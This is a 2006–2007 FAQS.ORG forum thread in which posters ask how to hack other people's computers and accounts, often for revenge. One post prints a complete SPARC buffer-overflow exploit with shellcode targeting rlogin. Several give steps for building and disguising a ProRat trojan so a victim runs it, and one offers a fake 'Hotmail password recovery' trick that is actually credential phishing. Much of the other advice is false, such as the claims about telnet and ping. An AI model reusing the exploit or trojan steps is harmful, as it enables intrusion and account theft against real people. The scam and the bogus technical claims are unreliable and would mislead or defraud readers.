Please tell me the details step by step so i can follow them???

 

Answer by arslan
Submitted on 1/1/2006
Rating: Not yet rated Rate this answer: Vote
Can anybody help me.i want to become a hacker.somebody hacks my id,i want to hack this.

 

Answer by mike
Submitted on 2/16/2006
Rating: Not yet rated Rate this answer: Vote
make an invisionfree board

www.invisionfree.com

tel him to go to it..

then go to the active user list and it shows the internet protocal

as to hide the IP

www.anonymizer.com

 

Answer by :]
Submitted on 3/11/2006
Rating: Not yet rated Rate this answer: Vote
I'll pay someone to hack 5 different people.
im.a.lemon.DUH@gmail.com

 

Answer by HI5 BUSINESS
Submitted on 3/16/2006
Rating: Not yet rated Rate this answer: Vote
HELLO WHO EVER IS TRYING TO TRACK SOMEONE WELL HERE IT IS! HOW TO DO IT??
THE SITE IS:
http://arul.telenet-systems.com/track.html
TRACE THE IP.....
MY EMAIL:
HI5BUSINESS@YAHOO.COM

 

Answer by shane
Submitted on 3/22/2006
Rating: Not yet rated Rate this answer: Vote
i want to now how do i get in someones sytem just by useing i.p but how do u do it and where do u type the i.p address

 

Answer by Chris
Submitted on 3/24/2006
Rating: Not yet rated Rate this answer: Vote
HI. I WANT TO LEARN HOW TO HACK SO MUCH.
Can someone please send me an email telling me how to hack a computer from scratch using windows xp (MS DOS) i have looked on the net everywhere and this is the best sit i found.
PLEASE EMAIL ME A VERY EASY TUTORIAL.
christa_fart@hotmail.com

 

Answer by this
Submitted on 4/14/2006
Rating: Not yet rated Rate this answer: Vote
i have a full understanding of hacking and their are a few things you guz need to know is that the what you are talking about is extremly hard and takes a long time to master, another thing it that what your talking about is also illegel and you can get your self jail time for hacking the wrong things. and before you try to learn how to hack go learn some computer languages, i recomend java and c++

 

Answer by Tom the hacker
Submitted on 4/22/2006
Rating: Not yet rated Rate this answer: Vote
There is one really easy way to get an IP address, type in "tracert <website name>" without the quotes and put any website's name after tracertm like for google it would be like this:
C:\\Documents and Settings\User>tracert www.google.com.

Then once you get the trace, look for the last IP address that doesn't have any code after it, like dublin [o94]-- pai(90] or something. Enter:

"telnet" then a space and the IP number, and if it is an old computer, you should be in. Sometimes you need to know the password.

 

Answer by DHIREN
Submitted on 4/22/2006
Rating: Not yet rated Rate this answer: Vote
I WANT TO KNOW HOW I CAN USE THE PRORAT SOFTWARE AS I WANT TO CRACK THE YAHOO MESSENGER ID

 

Answer by hELPPP
Submitted on 4/27/2006
Rating: Not yet rated Rate this answer: Vote
this is going to soud stupid but... i have the persons ip adress what do i do next i really desperatly want to hack this person , it is his hotmail account, but there is a purpose and this person he is evil he deserves it plzzz help :S xx

 

Answer by seaking revenge
Submitted on 5/2/2006
Rating: Not yet rated Rate this answer: Vote
"I WNA BE A HACKER!!!"
i want help from Alias Neo
please !!!!!

 

Answer by www.snoopinc.piczo.com
Submitted on 5/5/2006
Rating: Not yet rated Rate this answer: Vote
HEY if anyone wants to hack then here this!!!
Getting Ip's:--
To see the ip all computers you are connected to (web servers, people attempting to hack into your computer).
Go to dos (start>run>type command) and run the netstat command. Type netstat /? for details.
Connecting to other computers and what ports are:--

Servers send information. Clients retrieve. Simple.
Windows comes with a built in program to connect to other computers called telnet.
To start Windows telnet Start menu> Run> type Telnet. Click connect> remote system
Ports are doors into computers. Hosts are computer names
(ip number or a name that is translated into the ip automatically)
Different programs open different ports, but they always open the same ports so other computers know which port to connect to. You can get a port list listing all the different ports, but a basic one is:
11 :- Sends info on the computer
21 :- FTP (File transfer program)
23 :- Telnet (Login to the computers command line)
25 :- Smtp (Sends mail)
80 :- Http (Web pages)
There are thousands of different programs using different ports. You can get programs called portscanners which check a computer for all ports up to a certain number, looking for ways in. You can portscan a computer looking for ways-in.
Anyway, back to telnet.
Type www.yahoo.com as the host and port as 80 the click connect.
If nothing happens, you're in. Wow. You are connected to Yahoo's server.
You can now type http commands (you are connected to an http server, so it supports http commands). Ie. on an ftp server you can type open and it will do something. On an http server it will just wonder what the hell you are on about.
Type get / http/1.0 then press enter twice to get the file on the server at / (try /index.html) etc.)

How to find the location of a computer by knowing it's IP address

Again go to the command prompt and type in tracert xxx.xxx.xxx.xxx. Where xxx.xxx.xxx.xxx is the ip of the computer you want the location of. Let me give a shot of the actual output.
  

  
Do you see how it goes from my location and traces down the location of the computer 203.199.93.39. As you might suspect this particular computer is in India because it's on the backbone of vsnl.net.in. Infact it is true !! this is nothing but our good old timesofindia.com server. Now, tracert can be used not only with ip address but also with the domain name of a website ( infact all the domain names can be converted into IP addresses...you guys are smart so i don't need to go into details). So why not try using the command like this :
c:\>tracert www.timesofindia.com

You will see a similar output. You can learn more about the command options by typing tracert /?.
  
So now we know how to get a computer's IP address and how trace an IP. Let's learn about another important command called ping.

FOR MORE INFO ON HACKING THEN EMAIL ME AT: www.snoopinc.piczo.com@hotmail.com


 

Answer by trevor
Submitted on 5/11/2006
Rating: Not yet rated Rate this answer: Vote
!!!!!!!!!!!!!!!I WANNA BE A HACKER!!!!!!!!!
neo plz help me email me at dragonslayerxxxs@aol.com

 

Answer by Sassie babe
Submitted on 5/20/2006
Rating: Not yet rated Rate this answer: Vote
Hey people well my ex boyfriend hacked my account missparis101@hotmail.com! Will sum1 teach me how to get my email back! Please help me! Hes being threatening me n stuff! please come up with an answer :) thanks!

 

Answer by HackFriend
Submitted on 5/31/2006
Rating: Not yet rated Rate this answer: Vote
Hey, every1 my friend hacked my account on this game : "runescape"...i lost everything and all my hard work so now i wanna give him the taste of his own medicine .. so can any of u plz tell me how to hack his acc on this game? thanks!

 

Answer by HackFriend
Submitted on 5/31/2006
Rating: Not yet rated Rate this answer: Vote
Hey, every1 my friend hacked my account on this game : "runescape"...i lost everything and all my hard work so now i wanna give him the taste of his own medicine .. so can any of u plz tell me how to hack his acc on this game? thanks!

 

Answer by rush
Submitted on 6/1/2006
Rating: Not yet rated Rate this answer: Vote
I WNA BE A HACKER!!! Alias Neo plz help me, i got scammed in an online game called conquer online.... if i get his msn, am i able to create a keylogger in disguise as the conquer file and be able 2 get my account back???

 

Answer by waqas
Submitted on 6/17/2006
Rating: Not yet rated Rate this answer: Vote
i know how to know any ones ip very simple it is only mail me
waqaszakram@walla.com

 

Answer by STEVE
Submitted on 6/18/2006
Rating: Not yet rated Rate this answer: Vote
DOES ANYBODY KNOW HOW I CAN CONTROL SOMEONES COMP. I WANT TO CONTROL THE MOUSE, KEYBOARD,EVERYTHING I KNOW TH IP ADDRESS

 

Answer by Nidhogg
Submitted on 6/21/2006
Rating: Not yet rated Rate this answer: Vote
Hacking someones computer is illegal right?

 

Answer by rolly
Submitted on 6/25/2006
Rating: Not yet rated Rate this answer: Vote
ok evrything u want 2 kno is on the internet !!!GOOGLE IT!!! and HACKING IS NOT  a simple thing lyk its not a step by step thin ok and read the other poasts the tell u moast of the questions alrite and because i want to be nice here is a site that tells u a few simple things about comand prompt http://www.totse.com/en/hack/hack_attack/hackingyoursch179365.html
enjoy rolly-wp

 

Answer by ---
Submitted on 6/28/2006
Rating: Not yet rated Rate this answer: Vote
ok hackers, what's this ???

#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <unistd.h>

#define BUF_LENGTH      8200
#define EXTRA           100
#define STACK_OFFSET    4000
#define SPARC_NOP       0xa61cc013

u_char sparc_shellcode[] =
"\x82\x10\x20\xca\xa6\x1c\xc0\x13\x90\x0c\xc0\x13\x92\x0c\xc0\x13"
"\xa6\x04\xe0\x01\x91\xd4\xff\xff\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e"
"\x2f\x0b\xdc\xda\x90\x0b\x80\x0e\x92\x03\xa0\x08\x94\x1a\x80\x0a"
"\x9c\x03\xa0\x10\xec\x3b\xbf\xf0\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc"
"\x82\x10\x20\x3b\x91\xd4\xff\xff";

u_long get_sp(void)
{
  __asm__("mov %sp,%i0 \n");
}

void main(int argc, char *argv[])
{
  char buf[BUF_LENGTH + EXTRA];
  long targ_addr;
  u_long *long_p;
  u_char *char_p;
  int i, code_length = strlen(sparc_shellcode);

  long_p = (u_long *) buf;

  for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++)
    *long_p++ = SPARC_NOP;

  char_p = (u_char *) long_p;

  for (i = 0; i < code_length; i++)
    *char_p++ = sparc_shellcode[i];

  long_p = (u_long *) char_p;

  targ_addr = get_sp() - STACK_OFFSET;
  for (i = 0; i < EXTRA / sizeof(u_long); i++)
    *long_p++ = targ_addr;

  printf("Jumping to address 0x%lx\n", targ_addr);

  execl("/usr/bin/rlogin", "rlogin", buf, (char *) 0);
  perror("execl failed");
}

 

Answer by nxtgeneration_hacker
Submitted on 7/29/2006
Rating: Not yet rated Rate this answer: Vote
if u guys really want to  know about hacking and keyloggers the go for http://riskaddict.bravehost.com/index.html    its a damn good site to increase your knowledge.

 

Answer by Tightnme
Submitted on 8/12/2006
Rating: Not yet rated Rate this answer: Vote
umm i got everything i need to know I'm just wandering how do i acually give them through email do i send them file or any old thing?

 

Answer by mini me
Submitted on 8/16/2006
Rating: Not yet rated Rate this answer: Vote
i found this out:
click start>run>(type)cmd>(then type)
ping -a (then their ip adress)

if it works it should shut down their computer

 

Answer by Black Spirit
Submitted on 9/13/2006
Rating: Not yet rated Rate this answer: Vote
lmfao, trojans and ips are well dead. Start rootkitting or sumthing.

 

Answer by Carlos111
Submitted on 9/14/2006
Rating: Not yet rated Rate this answer: Vote
I need to learn the easiest way to get someones AIM password, i have seen people IM me and i would respond and then they would have my password... how do they do this? someone please helppp

 

Answer by khelan
Submitted on 10/10/2006
Rating: Not yet rated Rate this answer: Vote
I WNA BE A HACKER!!!
alias neo help me out bruv
i got the ip address but i dont know how to access his pc

 

Answer by hackajack
Submitted on 10/16/2006
Rating: Not yet rated Rate this answer: Vote
hi peps... was in this position about 5 years ago... any way i'vmade a good slide show teling u adsacly how to do it all. just go to http://www.webfile.ws/d/12707 and download it. took me quit a while so please leave u'raprishiation ;0P

 

Answer by S3xy
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
i have prorat and when i type the ip in it just gets disconnected in like 5 secs what is the prob? plz help

 

Answer by hacka4life
Submitted on 11/9/2006
Rating: Not yet rated Rate this answer: Vote
i can use prorat but when i enter the ip it just gets disconnected plz help

 

Answer by Spires33
Submitted on 11/16/2006
Rating: Not yet rated Rate this answer: Vote
2 years later......

 

Answer by Sam the man
Submitted on 12/14/2006
Rating: Not yet rated Rate this answer: Vote
I WANNA BE A HACKER!!! that would be tight if you could help me out dude.  i wanna know how to get their i.p. address through aim.  i cant figure it out. that'd be great if someone could  help me out.

 

Answer by i punish fags
Submitted on 1/7/2007
Rating: Not yet rated Rate this answer: Vote
HOW DO U BLOCK SOMEONE FROM HACKING YOUR COMPUTER IF THEY HAVE YOUR IP ADDRESS?

 

Answer by Splinter
Submitted on 1/19/2007
Rating: Not yet rated Rate this answer: Vote
Right! I have ProRat v1.9(fix2) and I have created a perfect trojan server and binded it with a game waiting to be sent to my "friend" whoz a complete moron. Just for reassurance..will this actualy work if he doesnt have any Anti-Virus progs or Firewalls setup and he opens the game file?

(Also Id have his IP address anyway)

 

Answer by naurus
Submitted on 3/3/2007
Rating: Not yet rated Rate this answer: Vote
i wish <i>i</i> new how 2 h4x0r! lol

 

Answer by John
Submitted on 3/6/2007
Rating: Not yet rated Rate this answer: Vote
Hacking is not something you should play with unless you get help from a pro or learn by a official site. You cold get many mistakes and end up in jail for hcking. Hacking is against the law. Keylogging is a diffrent way, less chance of getting caught. Do not use ms_dos, use "Prefect Keylogger"

 

Answer by expozed
Submitted on 3/29/2007
Rating: Not yet rated Rate this answer: Vote
Hacking hotmail is simple this technique works 50% of the time so just keep trying until the password of the victim shows up.

first thing to do log in to your hotmail account.
the account has to be over 30days old or it wont be recognized.

open a new message like your going to send an email were it says

To: helpingbot@hotmail.com
Cc:
Bcc:
subject:Password recovery
------------------------------------------------------------------------------------------------------
now in the big white box underneath put
(your hotmail account)
(your hotmail password)
(the "victims" hotmail account)

*without the brackets
------------------------------------------------------------------------------------------------------

ok now your done just click send and you should recieve a message in less than an hour.

(what this does is scramble the php and makes the server bot think you own the account since you already gave it a correct password with your account either it will "give you the persons password" or it will "change the persons password to yours".)

*Better do this quick coz they might find out the bug & fix it..

 

Answer by trevman
Submitted on 4/3/2007
Rating: Not yet rated Rate this answer: Vote
OK download prorat and get there ip using netstat after that using prorat create a server and send it to them incrypted so they donload it after that you can conect to them and screw them up butgood

 

Answer by Jai
Submitted on 4/3/2007
Rating: Not yet rated Rate this answer: Vote
Ok there is alott of dumbasses here ?
look at this
PATHETIC
hey i wanna hack someones computer
hey i wanna mess with someones cd drive
hey i wanna hack into a guys computer
SHUT UP ALREADY
if you realy are that desperate you would be learning it right now
NO REALY NETWORKER WOULD BE ON WEBSITES LIKE THIS
every website that here shows u can download something has a VIRUS, which means theyll hack ur computer if u download them SO DONT IF YOU ALL REALY WANNA LEARN ABOUT NETWORKING AKA IN YOUR LANGUAGE HACKING GO HERE
http://compnetworking.about.com/         its not my website but its a good one and helped me alott...

 

Answer by Newcomer
Submitted on 4/16/2007
Rating: Not yet rated Rate this answer: Vote
hey dear i read all comments that gives u all
I think ur expert in that field

but i want to now more about that

 

Answer by johnjames
Submitted on 5/6/2007
Rating: Not yet rated Rate this answer: Vote
What can i download to get log everything typed in another person's computer?

 

Answer by you all are n00bs
Submitted on 5/11/2007
Rating: Not yet rated Rate this answer: Vote
you guys are retarded. if you ask such dumb questions, you will never be able to do anything that is considered "hacking"
jump off a bridge and die

 

Answer by Joeydaman
Submitted on 6/5/2007
Rating: Not yet rated Rate this answer: Vote
hey iv been reading all this and its making me wonder. i might have missed it but what exactly has anyone said about what commands to use with the IP Address and MS-Dos? i would really like to know ty

 

Answer by nick
Submitted on 6/9/2007
Rating: Not yet rated Rate this answer: Vote
i need help haking on to runescape because my bro has blocked it on our computer can someone plz help me

 

Answer by xcaptainx
Submitted on 6/29/2007
Rating: Not yet rated Rate this answer: Vote
hello everyone.
i've got a big hack job.
recruiting the best of the best
you need to atleast understand linux or java
my job. is simple.
hack a single account on a web game.
Just use you're best hack. whatever it is.
if you can crack the server [ run on linux ] i would love for you to join. if you can keylog join, anything and everything.
Join up.
email me if you are interested.
email =
codenamexcaptainx@yahoo.com

 

Answer by apprenticeCS
Submitted on 7/11/2007
Rating: Not yet rated Rate this answer: Vote
I want to hack admin account at school [or create a new one] without admins finding out but they disabled command prompt and also disabled saving files as .bat how do i hack admin now [can't Download stuff onto PC either]

 

Answer by MASTER HACKER
Submitted on 7/12/2007
Rating: Not yet rated Rate this answer: Vote
Hacking really isn't that cool

 

Answer by HELP ME
Submitted on 7/13/2007
Rating: Not yet rated Rate this answer: Vote
omfg someone just tell me
i got there ip now what i do

 

Your answer will be published for anyone to see and rate.  Your answer will not be displayed immediately.  If you'd like to get expert points and benefit from positive ratings, please create a new account or login into an existing account below.


Your name or nickname:
If you'd like to create a new account or access your existing account, put in your password here:
Your answer:

FAQS.ORG reserves the right to edit your answer as to improve its clarity.  By submitting your answer you authorize FAQS.ORG to publish your answer on the WWW without any restrictions. You agree to hold harmless and indemnify FAQS.ORG against any claims, costs, or damages resulting from publishing your answer.

 

FAQS.ORG makes no guarantees as to the accuracy of the posts. Each post is the personal opinion of the poster. These posts are not intended to substitute for medical, tax, legal, investment, accounting, or other professional advice. FAQS.ORG does not endorse any opinion or any product or service mentioned mentioned in these posts.

 

<< Back to general questions


[ Home  |  FAQ-Related Q&As  |  General Q&As  |  Answered Questions ]

© 2008 FAQS.ORG. All rights reserved.